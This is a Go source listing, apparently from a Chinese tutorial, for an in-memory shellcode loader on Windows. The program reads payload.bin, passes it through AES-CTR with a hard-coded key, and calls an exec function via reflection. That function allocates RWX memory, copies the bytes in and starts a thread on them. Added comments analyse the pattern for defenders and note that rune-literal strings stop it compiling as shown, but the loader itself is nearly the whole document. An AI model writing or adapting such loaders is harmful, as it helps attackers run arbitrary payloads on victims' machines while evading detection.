Go语言反射技术:使用反射调用函数执行字节码
package main
import ( "crypto/aes" "crypto/cipher" "encoding/base64" "io/ioutil" "reflect" "syscall" "time" "unsafe" )
// Windows memory-allocation flags passed to VirtualAlloc in exec below.
const (
	MEM_COMMIT             = 0x1000 // commit physical storage for the pages
	MEM_RESERVE            = 0x2000 // reserve the virtual address range
	PAGE_EXECUTE_READWRITE = 0x40   // RWX protection; a private RWX region is a common memory-scanner indicator
)
// AesKey is the hard-coded symmetric key shared by Encode and Decode.
// It is 24 bytes long, so aes.NewCipher selects AES-192. Because the key
// ships inside the binary next to the data it protects, it provides no
// confidentiality against anyone who holds the binary. Note that the third
// element is the octal literal 077 (decimal 63, 0x3F), not 0x77 — possibly
// a typo, but changing it would change every ciphertext produced so far.
var AesKey = []byte{
	0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B,
	0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B,
	0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B,
}
// CipherFunc transforms src under key and returns the result. Because the
// signature carries no error, an implementation can only signal failure by
// its return value (see AesCipher).
type CipherFunc func(key []byte, src []byte) []byte
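// AesCipher applies AES in CTR mode to src and returns the result.
//
// CTR is symmetric, so the same call both encrypts and decrypts. The key
// length selects the variant: 16, 24 or 32 bytes give AES-128/192/256.
//
// Returns nil when key has an invalid length. The original discarded the
// aes.NewCipher error and then passed a nil cipher.Block to cipher.NewCTR,
// which panics; an explicit nil result lets callers detect the bad key.
//
// Caveat: the IV is fixed at all zeros, so every message encrypted under the
// same key reuses the same keystream (XOR of two ciphertexts equals XOR of
// the two plaintexts). That is only acceptable if a key is never used for
// more than one message. The fixed IV is kept because Decode depends on it.
func AesCipher(key []byte, src []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil
	}
	iv := make([]byte, aes.BlockSize) // all-zero IV, see caveat above
	stream := cipher.NewCTR(block, iv)
	dst := make([]byte, len(src))
	stream.XORKeyStream(dst, src)
	return dst
}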
// Crypt runs src through the supplied CipherFunc with key and returns the
// result. It is a thin indirection that lets callers choose the cipher.
// The parameter named cipher shadows the crypto/cipher package inside this
// function; that is harmless here because the package is not referenced.
func Crypt(cipher CipherFunc, key []byte, src []byte) []byte {
	apply := cipher
	out := apply(key, src)
	return out
}
// Encode AES-CTR-encrypts src under the package-level AesKey and returns the
// ciphertext encoded as standard (padded) base64.
func Encode(src string) string {
	ciphertext := Crypt(AesCipher, AesKey, []byte(src))
	return base64.StdEncoding.EncodeToString(ciphertext)
}
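// Decode reverses Encode: it base64-decodes src and AES-CTR-decrypts the
// result under the package-level AesKey.
//
// Returns nil when src is not valid standard base64. The original ignored
// the decode error and went on to "decrypt" whatever prefix had been decoded,
// producing garbage instead of a detectable failure.
func Decode(src string) []byte {
	ciphertext, err := base64.StdEncoding.DecodeString(src)
	if err != nil {
		return nil
	}
	return Crypt(AesCipher, AesKey, ciphertext)
}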
// Lazily resolved Windows API entry points used by exec: a memory allocation
// (VirtualAlloc), a raw memory copy (RtlMoveMemory) and a thread creation
// (CreateThread). This block is Windows-only. Note that the single-quoted
// names are rune literals in Go, not strings, so the listing does not compile
// as shown.
var (
	kernel32      = syscall.NewLazyDLL('kernel32.dll')
	ntdll         = syscall.NewLazyDLL('ntdll.dll')
	VirtualAlloc  = kernel32.NewProc('VirtualAlloc')
	RtlMoveMemory = ntdll.NewProc('RtlMoveMemory')
	CreateThread  = kernel32.NewProc('CreateThread')
)
// exec copies charcode into a freshly allocated read/write/execute region,
// starts a new thread at its first byte, and blocks until that thread exits.
//
// The allocate → copy → CreateThread sequence over a private RWX page is the
// textbook in-memory loader pattern, and it is precisely what memory scanners
// and API-telemetry-based detections key on: from a defender's point of view
// this function is the indicator, independent of whatever bytes it is given.
//
// Observations on the code as written:
//   - the error results of every Call are discarded, so an allocation or
//     thread-creation failure is never noticed;
//   - &charcode[0] panics on an empty slice;
//   - time.Sleep(5) sleeps 5 nanoseconds (time.Duration is in ns), i.e. it is
//     effectively a no-op;
//   - WaitForSingleObject with INFINITE means exec does not return while the
//     new thread is alive.
func exec(charcode []byte) {
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	time.Sleep(5)
	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
	time.Sleep(5)
	handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0)
	time.Sleep(5)
	syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE)
}
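// readFile returns the contents of filename, or nil if it cannot be read.
//
// The original discarded ReadFile's error, so a missing or unreadable file
// surfaced later as an empty or partial payload rather than at the point of
// failure. The signature is kept, so failure is still signalled only by the
// nil return; callers should check len(data) == 0 before using the result.
// ioutil.ReadFile is deprecated in favour of os.ReadFile (Go 1.16+), but the
// existing import set is kept unchanged here.
func readFile(filename string) []byte {
	data, err := ioutil.ReadFile(filename)
	if err != nil {
		return nil
	}
	return data
}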
// main reads ./payload.bin, round-trips it through Encode and Decode, and
// hands the result to exec via reflect.Value.Call.
//
// Points worth noting for anyone analysing this listing:
//   - Encode immediately followed by Decode is a no-op: the plaintext never
//     leaves this process and payload.bin is stored unencrypted on disk, so
//     the AES layer adds no confidentiality here;
//   - reflect.Value.Call is functionally identical to calling exec directly;
//     it changes how the call reads in source, not what executes;
//   - shellCodeHex holds raw bytes, not hex text, despite its name;
//   - the single-quoted path is a rune literal, not a string, so the listing
//     does not compile as shown.
func main() {
	payload := string(readFile('./payload.bin'))
	encodedPayload := Encode(payload)
	shellCodeHex := Decode(encodedPayload)
	// Obtain a reflect.Value wrapping the exec function.
	execFunc := reflect.ValueOf(exec)
	// Wrap the byte slice as the single reflect.Value argument.
	params := []reflect.Value{reflect.ValueOf(shellCodeHex)}
	// Invoke exec through reflection.
	execFunc.Call(params)
}